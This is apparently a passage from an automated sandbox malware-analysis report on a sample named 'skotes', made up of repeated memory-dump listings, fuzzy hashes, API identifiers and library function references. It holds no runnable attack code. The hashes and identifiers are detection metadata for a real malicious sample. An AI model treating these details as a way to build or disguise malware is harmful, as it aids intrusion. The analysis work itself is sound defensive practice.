                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                              • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                                                                                                                              • API String ID: 348560076-3997890769
                                                                                                                                                                                                                                              • Opcode ID: 4a00cf0081e5ccde6ba39bde0968967e96e97b474b7a3eadc16b5a7aef4b159d
                                                                                                                                                                                                                                              • Instruction ID: 09a68aa81f70c1949d497360bb11e91c89195d73b9ec5f8de4424e3f5c38d1b7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a00cf0081e5ccde6ba39bde0968967e96e97b474b7a3eadc16b5a7aef4b159d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A0122B16903295EDB04B7B59C0DFBF35DC9F01348F2064A9AA40E3191EF74C80883A0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeRWList.LIBCONCRT ref: 00BF6E73
                                                                                                                                                                                                                                                • Part of subcall function 00BF4E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00BF4E7F
                                                                                                                                                                                                                                                • Part of subcall function 00BF4E6E: List.LIBCMT ref: 00BF4E89
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BF6E85
                                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00BF6EAA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                              • String ID: eventObject
                                                                                                                                                                                                                                              • API String ID: 1288476792-1680012138
                                                                                                                                                                                                                                              • Opcode ID: de1360470e94da036b28c240b339ec85b6a03ba386cbe62ca581990467f0a96a
                                                                                                                                                                                                                                              • Instruction ID: 25ee0fcfc78e15408c5c270b0629e1cfec6b63f849c1f3914c1fe1f5e644ea29
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de1360470e94da036b28c240b339ec85b6a03ba386cbe62ca581990467f0a96a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0811E936540218E6DB28E7A5DD4AFFE73E85F04700F2042A6FA05B70D1DB709A08C665
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00BFA102
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00BFA126
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BFA139
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                              • String ID: pScheduler
                                                                                                                                                                                                                                              • API String ID: 246774199-923244539
                                                                                                                                                                                                                                              • Opcode ID: 7c4db6f2038749915749e8fbd9810b063a2d67df41753363349f664a62801d69
                                                                                                                                                                                                                                              • Instruction ID: e805c7c9e8586fe341bd65ad781df327099243354231bae9802c62ebe299df40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c4db6f2038749915749e8fbd9810b063a2d67df41753363349f664a62801d69
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74F0BB7590020CA7C724FA55D892C6EB7F89E51714B2181A9E70977181DB709B09C691
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                                              • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                              • Instruction ID: 498cdc525dfdfb83c2c889e327597b750da7a13a5514c4ff37e8d4622be60cdf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AB136329046559FEB15CF28C8C17EEBBE5EF55340F24426AE865EB2C2D6348E42CB60
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
